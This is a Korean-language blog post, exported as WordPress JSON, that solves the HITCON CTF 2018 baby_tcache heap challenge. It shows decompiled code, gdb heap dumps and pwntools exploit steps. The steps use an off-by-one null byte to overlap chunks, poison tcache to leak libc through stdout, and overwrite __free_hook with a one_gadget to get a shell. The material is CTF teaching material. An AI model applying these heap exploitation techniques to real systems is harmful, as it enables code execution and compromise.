{"id":3762,"date":"2025-06-30T22:12:37","date_gmt":"2025-06-30T13:12:37","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3762"},"modified":"2025-06-30T22:22:46","modified_gmt":"2025-06-30T13:22:46","slug":"hitcon-ctf-2018-baby_tcache-%ed%9e%99%eb%82%b4%ec%9a%a9-%ec%b6%9c%eb%a0%a5%ec%97%86%eb%8a%94-malloc-free-%ea%b8%b0%eb%8a%a5%eb%a7%8c-%ec%9e%88%eb%8a%94-%ec%bc%80%ec%9d%b4%ec%8a%a42","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3762","title":{"rendered":"[HITCON CTF 2018] baby_tcache (\ud799\ub0b4\uc6a9 \ucd9c\ub825\uc5c6\ub294 malloc\/free \uae30\ub2a5\ub9cc \uc788\ub294 \ucf00\uc774\uc2a42)"},"content":{"rendered":"\n

Source<\/h3>\n\n\n\n

https:\/\/github.com\/integeruser\/on-pwning\/tree\/master\/2018-hitcon\/Baby-Tcache<\/a><\/p>\n\n\n\n

checksec<\/h3>\n\n\n\n
checksec .\/baby_tcache\n[*] '\/home\/ubuntu\/study\/baby_tcache\/baby_tcache'\n    Arch:       amd64-64-little\n    RELRO:      Full RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        PIE enabled<\/pre>\n\n\n\n
Decompiled-src \/ Analysis<\/h3>\n\n\n\n
main<\/h3>\n\n\n\n
\uc804\uc5d0 \ubd24\ub358 childheap \ubb38\uc81c\uc640 \uac19\uc774<\/p>\n\n\n\n
    \n
  1. new_heap<\/li>\n\n\n\n
  2. delete_heap<\/li>\n<\/ol>\n\n\n\n
    2\uac00\uc9c0 \uba54\ub274\ub9cc \uc874\uc7ac\ud558\uace0 print_heap \uac19\uc740 \ud799 \ub0b4\uc6a9 \ucd9c\ub825\uc744 \ud560 \uc218 \uc5c6\ub2e4.<\/p>\n\n\n\n
    void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)\n{\n  __int64 menu; \/\/ rax\n\n  initialize(a1, a2, a3);\n  while ( 1 )\n  {\n    while ( 1 )\n    {\n      print_help();\n      menu = read_number_by_atoll();\n      if ( menu != 2 )\n        break;\n      delete_heap();\n    }\n    if ( menu == 3 )\n      _exit(0);\n    if ( menu == 1 )\n      new_heap();\n    else\n      puts(\"Invalid Choice\");\n  }\n}<\/pre>\n\n\n\n
    1. new_heap<\/h3>\n\n\n\n
    idx\ub294 0~9, malloc size\ub294 0x2000\uc774\ud558 \uc870\uac74\ud558\uc5d0
    \ud560\ub2f9\ub41c \uc2ac\ub86f\uc5d0\ub2e4\uac00 \ub370\uc774\ud130\ub97c \uc800\uc7a5\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
    int new_heap()\n{\n  _QWORD *v0; \/\/ rax\n  int i; \/\/ [rsp+Ch] [rbp-14h]\n  _BYTE *v3; \/\/ [rsp+10h] [rbp-10h]\n  unsigned __int64 size; \/\/ [rsp+18h] [rbp-8h]\n\n  for ( i = 0; ; ++i )\n  {\n    if ( i > 9 )\n    {\n      LODWORD(v0) = puts(\":(\");\n      return (int)v0;\n    }\n    if ( !qword_202060[i] )\n      break;\n  }\n  printf(\"Size:\");\n  size = read_number_by_atoll();\n  if ( size > 0x2000 )\n    exit(-2);\n  v3 = malloc(size);\n  if ( !v3 )\n    exit(-1);\n  printf(\"Data:\");\n  read_data(v3, (unsigned int)size);\n  v3[size] = 0;\n  qword_202060[i] = v3;\n  v0 = qword_2020C0;\n  qword_2020C0[i] = size;\n  return (int)v0;\n}<\/pre>\n\n\n\n
    2. delete_heap<\/h3>\n\n\n\n
    idx\ub97c \uc785\ub825\ud558\uba74, \ud560\ub2f9\ub41c heap \ub0b4\uc6a9\uc5d0 \uc804\ubd80\ub2e4 0xDA\ub85c memset\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n
    \uadf8\ub7f0\ub2e4\uc74c free\uc2dc\ud0a4\uace0, \uc804\uc5ed\uc8fc\uc18c\uc5d0 \uc788\ub358 \uc800\uc7a5\ub41c \ud560\ub2f9\uc8fc\uc18c\uc640 \ud560\ub2f9\ud06c\uae30\ub97c 0\uc73c\ub85c \ucd08\uae30\ud654\ud55c\ub2e4.<\/p>\n\n\n\n
    int delete_heap()\n{\n  unsigned __int64 idx; \/\/ [rsp+8h] [rbp-8h]\n\n  printf(\"Index:\");\n  idx = read_number_by_atoll();\n  if ( idx > 9 )\n    exit(-3);\n  if ( qword_202060[idx] )\n  {\n    memset((void *)qword_202060[idx], 0xDA, qword_2020C0[idx]);\n    free((void *)qword_202060[idx]);\n    qword_202060[idx] = 0;\n    qword_2020C0[idx] = 0;\n  }\n  return puts(\":)\");\n}<\/pre>\n\n\n\n
    Solution<\/h3>\n\n\n\n
    1. \uccad\ud06c \uc624\ubc84\ub7a9\ud551<\/h3>\n\n\n\n
    tcache chunk\ub294 0x410 \ud06c\uae30\uc758 \ud799\uc744 \ud560\ub2f9\uc2dc \ud574\ub2f9\ub418\uc9c0 \uc54a\uae30 \ub54c\ubb38\uc5d0
    \uba3c\uc800, \uadf8 \uc774\uc0c1\uc758 \ud06c\uae30\uc778 0x410 \ud06c\uae30\uc758 \ud799\uc744 \uc0dd\uc131\ud55c\ub2e4.<\/p>\n\n\n\n
    new_heap(0x410, b\"A\"*8)    #0<\/pre>\n\n\n\n
    \uadf8\ub7ec\uba74 \uc544\ub798\uc640 \uac19\uc774 0x420 \ud06c\uae30\uc758 \uccad\ud06c\uac00 \uc0dd\uae34\ub2e4.<\/p>\n\n\n\n
    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0x420                Used                None              None<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \uc774\uc5b4\uc11c \ucc28\ub840\ub300\ub85c \ub2e4\uc74c \ud06c\uae30\uc758 \uccad\ud06c\ub97c \ud560\ub2f9\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n
        new_heap(0x60, b\"B\"*8)     #1\n    new_heap(0x60, b\"C\"*8)     #2\n    new_heap(0x4f0, b\"D\"*8)    #3\n    new_heap(0xf0, b\"E\"*8)     #4<\/pre>\n\n\n\n
    \uadf8\ub7fc \ub2e4\uc74c\uacfc \uac19\uc740 \uacb0\uacfc\ub97c \uac00\uc9c4\ub2e4.<\/p>\n\n\n\n
    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0x420                Used                None              None\n0x555555603670      0x0                 0x70                 Used                None              None\n0x5555556036e0      0x0                 0x70                 Used                None              None\n0x555555603750      0x0                 0x500                Used                None              None\n0x555555603c50      0x0                 0x100                Used                None              None<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \uadf8\ub9ac\uace0 2\ubc88 \uc778\ub371\uc2a4\uc5d0 \ud560\ub2f9\ub41c \uccad\ud06c\ub97c free\ud574\ubcf8\ub2e4.<\/p>\n\n\n\n
    delete_heap(2)<\/pre>\n\n\n\n
    \uadf8\ub7ec\uba74,
    0x70 \ud06c\uae30\ub97c \uad00\ub9ac\ud558\ub294 tcache \ub9ac\uc2a4\ud2b8\uc5d0 free\ub41c \uccad\ud06c\uac00 \ub4e4\uc5b4\uac04\ub2e4.<\/p>\n\n\n\n
    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0x420                Used                None              None\n0x555555603670      0x0                 0x70                 Used                None              None\n0x5555556036e0      0x0                 0x70                 Freed                0x0              None\n0x555555603750      0x0                 0x500                Used                None              None\n0x555555603c50      0x0                 0x100                Used                None              None\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555603d50 (size : 0x202b0) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x0\n(0x70)   tcache_entry[5](1): 0x5555556036f0\n\ngdb-peda$ p *(tcache_entry *)0x5555556036f0\n$1 = {\n  next = 0x0, \n  key = 0x555555603010\n}<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    fake \uccad\ud06c\ub97c \ub9cc\ub4e4\uc5b4\uc11c \uc624\ubc84\ub798\ud551\ud558\uae30 \uc704\ud55c \uc900\ube44\uacfc\uc815\uc73c\ub85c \ubcf4\uc778\ub2e4.<\/p>\n\n\n\n
    new_heap(0x68, b'a'*0x60 + p64(0x500))<\/pre>\n\n\n\n
    \uadf8\ub9ac\uace0 \ud799\uc744 \uc0b4\ud3b4\ubcf4\uba74, \uc774\uc0c1\ud55c \uc810\uc744 \ubc1c\uacac\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
    0x70 \ud06c\uae30\ub97c \uad00\ub9ac\ud558\ub294 tcache\ub85c\ubd80\ud130 \ub2e4\uc2dc \ud560\ub2f9\ubc1b\uc73c\uba74,
    0x5555556036e0 \uccad\ud06c\ub294 Used\ub85c \ud799 \uc0ac\uc6a9\uc911\uc774\ub77c\uace0 \ub098\ud0c0\ub098\uc57c \ud558\ub294\ub370 \uadf8\ub807\uc9c0 \uc54a\ub2e4.<\/strong><\/p>\n\n\n\n
    \uc5ec\uc804\ud788 Freed\ub85c \ub098\uc628\ub2e4 !!!<\/strong><\/p>\n\n\n\n
    gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0x420                Used                None              None\n0x555555603670      0x0                 0x70                 Used                None              None\n0x5555556036e0      0x0                 0x70                 Freed 0x61616161616161610x6161616161616161\n0x555555603750      0x500               0x500                Used                None              None\n0x555555603c50      0x0                 0x100                Used                None              None<\/pre>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \uc774\ub7ec\ud55c \uc774\uc720\ub294 \uc0ac\uc2e4<\/p>\n\n\n\n
    new_heap \ud568\uc218\ub97c \uc790\uc138\ud788 \uc0b4\ud3b4\ubcf4\uba74,
    v3[size] = 0<\/code><\/strong> \ucf54\ub4dc\uc5d0\uc11c off-by-one NULL byte overflow \ucde8\uc57d\uc810<\/strong>\uc774 \ubc1c\uc0dd\ud55c\ub2e4.<\/p>\n\n\n\n
    \ub530\ub77c\uc11c malloc size & 8 == 8<\/strong>\uc77c \uacbd\uc6b0, next chunk \ud06c\uae30\uc5d0 \ub36e\uc5b4\uc9c8 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
    \"\"<\/figure>\n\n\n\n
    \ub2e4\uc74c\uc73c\ub85c 0\ubc88, 3\ubc88, 1\ubc88 \uc778\ub371\uc2a4\uc758 \uccad\ud06c\ub97c \ucc28\ub840\ub300\ub85c free\ud574\ubcf8\ub2e4.<\/strong><\/p>\n\n\n\n
      \n
    1. 0\ubc88 \uc778\ub371\uc2a4\ub97c free.<\/li>\n<\/ol>\n\n\n\n
      delete_heap(0)<\/pre>\n\n\n\n
      \uacb0\uacfc<\/strong><\/p>\n\n\n\n
      free\ub41c 0\ubc88 \uccad\ud06c\ub294 \ud06c\uae30\uac00 0x420\uc73c\ub85c, tcache\uc5d0 \ud574\ub2f9\ub418\uc9c0 \uc54a\uae30\uc5d0<\/strong>
      unsorted bin \ub9ac\uc2a4\ud2b8\uc5d0 \ub4e4\uc5b4\uac14\ub2e4.<\/strong><\/p>\n\n\n\n
      gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0x420                Freed     0x7ffff7dcdca0    0x7ffff7dcdca0\n0x555555603670      0x420               0x70                 Used                None              None\n0x5555556036e0      0x0                 0x70                 Freed 0x61616161616161610x6161616161616161\n0x555555603750      0x500               0x500                Used                None              None\n0x555555603c50      0x0                 0x100                Used                None              None\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555603d50 (size : 0x202b0) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x555555603250 (size : 0x420)<\/pre>\n\n\n\n
      unsorted bin \ub9ac\uc2a4\ud2b8\uc5d0 \ub4e4\uc5b4\uac04 \ud799 \ud2b9\uc131\uc0c1 fd, bk\uc5d0 main_arena+96 \uc8fc\uc18c\uac00 \ub4e4\uc5b4\uac04\ub2e4.<\/strong><\/p>\n\n\n\n
      \"\"<\/figure>\n\n\n\n
      2. 3\ubc88 \uc778\ub371\uc2a4\ub97c free.<\/p>\n\n\n\n
        <\/ol>\n\n\n\n
        delete_heap(3)<\/pre>\n\n\n\n
        \uacb0\uacfc<\/strong><\/p>\n\n\n\n
        0x555555603250 \uccad\ud06c\uac00 Free\ub41c \uc0c1\ud0dc\uc778\ub370, 0xa00\uc73c\ub85c \ud06c\uae30\uac00 \ub300\ud3ed \uc99d\uac00\ud558\uc600\ub2e4.<\/strong><\/p>\n\n\n\n
        0x555555603250 \uccad\ud06c\ub294 unsorted bin\uc774\uba70,<\/strong><\/p>\n\n\n\n
        \ucd94\uc815\ud55c\ubc14\ub85c\ub294 chunk overlapping\uc774 \ubc1c\uc0dd\ud55c\uac8c \uc544\ub2d0\uae4c \uc2f6\ub2e4.<\/p>\n\n\n\n
        gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0xa00                Freed     0x7ffff7dcdca0    0x7ffff7dcdca0\n0x555555603c50      0xa00               0x100                Used                None              None\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555603d50 (size : 0x202b0) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x555555603250 (size : 0xa00)<\/pre>\n\n\n\n
        \ud799\uc744 \ub354 \uc0b4\ud3b4\ubcf4\ub2c8, \ud55c\uac00\uc9c0 \uc5bb\uc740 \ud78c\ud2b8\ub294 0x555555603750 \uc9c0\uc810\uc778 \uac83 \uac19\ub2e4.<\/p>\n\n\n\n
        \uc774\uc804 new_heap(0x68, b'a'*0x60 + p64(0x500))<\/code> \ucf54\ub4dc\uc758 0x500\uc774\ub77c\ub294 fake_prev\uac00 \ub4e4\uc5b4\uac00\uc838\uc788\uae30 \ub54c\ubb38\uc5d0<\/p>\n\n\n\n
        0x555555603760 alloc\ub41c \uc8fc\uc18c\ub97c free\uc2dc\ud0ac\ub824 \ud558\uba74,
        mchunk_size\uc5d0\ub294 PREV_IN_USE \ube44\ud2b8\uac00 \uaebc\uc838\uc788\uace0 \uc4f0\uc5ec\uc9c4 fake_prev\uc5d0 \uc758\ud574
        0x555555603750-0x500 = 0x555555603250\uc73c\ub85c, free\ub41c \uccad\ud06c\uc758 \uc2dc\uc791\uc810\uc774 \ub420 \uc218 \uc788\uc744 \uac83\uc774\ub2e4.<\/p>\n\n\n\n
        PREV_INUSE \ube44\ud2b8\uac00 \uaebc\uc838\uc788\ub2e4\ub294 \uc758\ubbf8\ub294 \uc704,
        \uadf8\ub7ec\ub2c8\uae4c \ubc14\ub85c \uc778\uc815\ud569 \ub0ae\uc740 \uc8fc\uc18c\uc758 \uccad\ud06c\uac00 FREE\ub41c \uc0c1\ud0dc\ub97c \uc758\ubbf8\ud55c\ub2e4.<\/p>\n\n\n\n
        \uc544\ubb34\ud2bc chunk overlapping\uc774 \ubc1c\uc0dd\ud55c\ub4ef \ubcf4\uc600\ub2e4.<\/p>\n\n\n\n
        \"\"<\/figure>\n\n\n\n
          \n
        1. \ub9c8\uc9c0\ub9c9\uc73c\ub85c 1\ubc88 \uc778\ub371\uc2a4 \uccad\ud06c\ub97c Free\ud574\ubcf8\ub2e4.<\/li>\n<\/ol>\n\n\n\n
          delete_heap(1)<\/pre>\n\n\n\n
          \uacb0\uacfc<\/strong><\/p>\n\n\n\n
          unsortbin: 0x555555603250 (overlap chunk with 0x555555603670(freed) )<\/strong>
          (0x70) tcache_entry5<\/a>: 0x555555603680<\/strong><\/p>\n\n\n\n
          \uc704\uc640 \uac19\uc774 unsorted bin\uc5d0\uc11c overlap chunk\uac00 \ub098\ud0c0\ub098\uace0,
          tcache_entry\uc5d0 0x555555603680 \uccad\ud06c\uac00 \ub4e4\uc5b4\uac14\ub2e4.<\/strong><\/p>\n\n\n\n
          gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0xa00                Freed     0x7ffff7dcdca0    0x7ffff7dcdca0\n0x555555603c50      0xa00               0x100                Used                None              None\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555603d50 (size : 0x202b0) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x555555603250 (overlap chunk with 0x555555603670(freed) )\n(0x70)   tcache_entry[5](1): 0x555555603680<\/pre>\n\n\n\n
          \"\"<\/figure>\n\n\n\n
            \n
          1. new_heap(0x410, b'b'*8)<\/code><\/strong><\/li>\n<\/ol>\n\n\n\n
            \uacb0\uacfc<\/p>\n\n\n\n
            gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0x420                Used                None              None\n0x555555603670      0x400               0x5e0                Freed     0x7ffff7dcdca0    0x7ffff7dcdca0\n0x555555603c50      0x5e0               0x100                Used                None              None\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555603d50 (size : 0x202b0) \n       last_remainder: 0x0 (size : 0x0) \n            unsortbin: 0x555555603670 (overlap chunk with 0x555555603670(freed) )\n(0x70)   tcache_entry[5](1): 0x555555603680 --> 0x7ffff7dcdca0 --> 0x555555603d50<\/pre>\n\n\n\n
            \"\"<\/figure>\n\n\n\n
              \n
            1. new_heap(0x100, p16(0xe760))<\/code><\/li>\n<\/ol>\n\n\n\n
              \uacb0\uacfc<\/strong><\/p>\n\n\n\n
              \uc774\uc81c \uc55e\uc73c\ub85c 0x60 \ud06c\uae30\ub85c malloc\uc744 \ud558\uac8c \ub41c\ub2e4\uba74, tcache_entry \ub9ac\uc2a4\ud2b8\ub85c\ubd80\ud130 \ucc28\ub840\ub300\ub85c
              0x555555603680, 0x7ffff7dce760 \uccad\ud06c\ub97c \ud560\ub2f9\ubc1b\uac8c \ub41c\ub2e4.<\/strong><\/p>\n\n\n\n
              gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0x420                Used                None              None\n0x555555603670      0x400               0x110                Freed     0x7ffff7dce760              None\n0x555555603780      0xdadadadadadada00  0x4d0                Freed     0x7ffff7dcdca0    0x7ffff7dcdca0\n0x555555603c50      0x4d0               0x100                Used                None              None\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555603d50 (size : 0x202b0) \n       last_remainder: 0x555555603780 (size : 0x4d0) \n            unsortbin: 0x555555603780 (size : 0x4d0)\n(0x70)   tcache_entry[5](1): 0x555555603680 --> 0x7ffff7dce760 --> 0xfbad2887 (invaild memory)<\/pre>\n\n\n\n
              \"\"<\/figure>\n\n\n\n
              3. new_heap(0x60, b\"\\x60\")<\/code><\/p>\n\n\n\n
                <\/ol>\n\n\n\n
                \uacb0\uacfc<\/strong><\/p>\n\n\n\n
                0x555555603680 \uccad\ud06c\ub97c \ud560\ub2f9\ubc1b\uc558\ub2e4.<\/strong><\/p>\n\n\n\n
                \ucd94\ud6c4 \ud560\ub2f9\ubc1b\ub294 \uccad\ud06c\ub294 0x7ffff7dce760\uc778 stdout \uad6c\uc870\uccb4 \uc8fc\uc18c\uc774\ub2e4.<\/strong><\/p>\n\n\n\n
                gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0x420                Used                None              None\n0x555555603670      0x400               0x110                Used                None              None\n0x555555603780      0xdadadadadadada00  0x4d0                Freed     0x7ffff7dcdca0    0x7ffff7dcdca0\n0x555555603c50      0x4d0               0x100                Used                None              None\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555603d50 (size : 0x202b0) \n       last_remainder: 0x555555603780 (size : 0x4d0) \n            unsortbin: 0x555555603780 (size : 0x4d0)\n(0x70)   tcache_entry[5](0): 0x7ffff7dce760 --> 0xfbad2887 (invaild memory)<\/pre>\n\n\n\n
                \ud799 \ub0b4\uc6a9\uc5d0\ub294 \uac70\uc758 \ubcc0\ud654\uac00 \uc5c6\uc5c8\ub2e4.<\/p>\n\n\n\n
                \"\"<\/figure>\n\n\n\n
                2. stdout \uc8fc\uc18c\uc5d0 AAW, leak\uc744 \ud1b5\ud574 libc base \uad6c\ud558\uae30<\/h3>\n\n\n\n
                \uc774\uc81c 0x7ffff7dce760 \uccad\ud06c\ub85c \ud560\ub2f9\ubc1b\uc544 AAW, leak\uc744 \ud558\uc5ec libc \uc8fc\uc18c\ub97c \uad6c\ud55c\ub2e4.<\/strong><\/p>\n\n\n\n
                    pay = p64(0xfbad1800)\n    pay += p64(0)*3\n    pay += p8(0)\n\n    # ip()\n    new_heap(0x60, pay)\n    \n    leak = r()\n    leak = leak[0xc8:0xc8+8]\n    leak = uu64(leak)\n    info(f\"leak: {hex(leak)}\")\n    l.address = leak - l.sym._IO_2_1_stdin_\n    success(f\"libc base: {hex(l.address)}\")<\/pre>\n\n\n\n
                3. double free\ud558\uc5ec free_hook\uc5d0 onegadget \ub36e\uc5b4 \uc258\uc5bb\uae30<\/h3>\n\n\n\n
                    delete_heap(3)\n    delete_heap(1)\n<\/pre>\n\n\n\n
                \uc778\ub371\uc2a4 1\ubc88\uacfc 3\ubc88\uc740 \uc11c\ub85c \uac19\uc740 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0a8\ub2e4.<\/p>\n\n\n\n
                gdb-peda$ x\/17gx 0x0000555555400000+0x202060\n0x555555602060:\t0x0000555555603260\t0x0000555555603680 (1)\n0x555555602070:\t0x00005555556036f0\t0x0000555555603680 (3)\n0x555555602080:\t0x0000555555603c60\t0x00007ffff7dce760\n0x555555602090:\t0x0000000000000000\t0x0000000000000000\n0x5555556020a0:\t0x0000000000000000\t0x0000000000000000\n0x5555556020b0:\t0x0000000000000000\t0x0000000000000000\n0x5555556020c0:\t0x0000000000000410\t0x0000000000000100\n0x5555556020d0:\t0x0000000000000068\t0x0000000000000060\n0x5555556020e0:\t0x00000000000000f0<\/pre>\n\n\n\n
                \uacb0\uacfc<\/strong><\/p>\n\n\n\n
                delete_heap(3)<\/code>\ub9cc \ud588\uc744\ub54c\uc758 \uacb0\uacfc<\/p>\n\n\n\n
                \ud558\ub098\uc758 tcache \ub9ac\uc2a4\ud2b8\uc5d0 \ub4e4\uc5b4\uac04\ub2e4.<\/p>\n\n\n\n
                gdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555603d50 (size : 0x202b0) \n       last_remainder: 0x555555603780 (size : 0x4d0) \n            unsortbin: 0x555555603780 (size : 0x4d0)\n(0x70)   tcache_entry[5](255): 0xfbad2887 (invaild memory)\n(0x110)   tcache_entry[15](1): 0x555555603680<\/pre>\n\n\n\n
                delete_heap(1)<\/code>\uae4c\uc9c0 \ud588\uc744\ub54c\uc758 \uacb0\uacfc<\/p>\n\n\n\n
                0x110 \uccad\ud06c\ub97c \uad00\ub9b0\ud558\ub294 tcache \ub9ac\uc2a4\ud2b8\uc5d0 2\uac1c\uac00 \uc0dd\uae30\ub294\ub370, \uc624\ubc84\ub7a9 \uccad\ud06c\ub85c\uc368<\/p>\n\n\n\n
                gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0x420                Used                None              None\n0x555555603670      0x400               0x110                Freed     0x555555603680              None\n0x555555603780      0xdadadadadadada00  0x4d0                Freed     0x7ffff7dcdca0    0x7ffff7dcdca0\n0x555555603c50      0x4d0               0x100                Used                None              None\n\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555603d50 (size : 0x202b0) \n       last_remainder: 0x555555603780 (size : 0x4d0) \n            unsortbin: 0x555555603780 (size : 0x4d0)\n(0x70)   tcache_entry[5](255): 0xfbad2887 (invaild memory)\n(0x110)   tcache_entry[15](2): 0x555555603680 --> 0x555555603680 (overlap chunk with 0x555555603670(freed) )<\/pre>\n\n\n\n
                0x100 \ud799\uc744 \ud560\ub2f9\ud574 \uaebc\ub0b4\uc11c \uac12\uc744 \uc4f4\ub2e4\uba74,<\/p>\n\n\n\n
                where = l.sym.__free_hook\nwhat = l.address + 0x4f302\n\nnew_heap(0x100, p64(where)) #1<\/pre>\n\n\n\n
                \uacb0\uacfc<\/strong><\/p>\n\n\n\n
                \uadf8 \uac12\uc740 \uace7 \ucd94\ud6c4 \uac12\uc368\uc9c8 \ub300\uc0c1 \uc8fc\uc18c\ub97c \uc758\ubbf8\ud55c\ub2e4.<\/strong><\/p>\n\n\n\n
                gdb-peda$ parseheap\naddr                prev                size                 status              fd                bk                \n0x555555603000      0x0                 0x250                Used                None              None\n0x555555603250      0x0                 0x420                Used                None              None\n0x555555603670      0x400               0x110                Freed     0x7ffff7dcf8e8              None\n0x555555603780      0xdadadadadadada00  0x4d0                Freed     0x7ffff7dcdca0    0x7ffff7dcdca0\n0x555555603c50      0x4d0               0x100                Used                None              None\ngdb-peda$ heapinfo\n(0x20)     fastbin[0]: 0x0\n(0x30)     fastbin[1]: 0x0\n(0x40)     fastbin[2]: 0x0\n(0x50)     fastbin[3]: 0x0\n(0x60)     fastbin[4]: 0x0\n(0x70)     fastbin[5]: 0x0\n(0x80)     fastbin[6]: 0x0\n(0x90)     fastbin[7]: 0x0\n(0xa0)     fastbin[8]: 0x0\n(0xb0)     fastbin[9]: 0x0\n                  top: 0x555555603d50 (size : 0x202b0) \n       last_remainder: 0x555555603780 (size : 0x4d0) \n            unsortbin: 0x555555603780 (size : 0x4d0)\n(0x70)   tcache_entry[5](255): 0xfbad2887 (invaild memory)\n(0x110)   tcache_entry[15](1): 0x555555603680 --> 0x7ffff7dcf8e8 (__free_hook)<\/pre>\n\n\n\n
                onegdaget\uc73c\ub85c __free_hook\uc744 \ub36e\uace0, free \ud638\ucd9c\ud558\uc5ec \uc258 \uc5bb\ub294\ub2e4.<\/p>\n\n\n\n
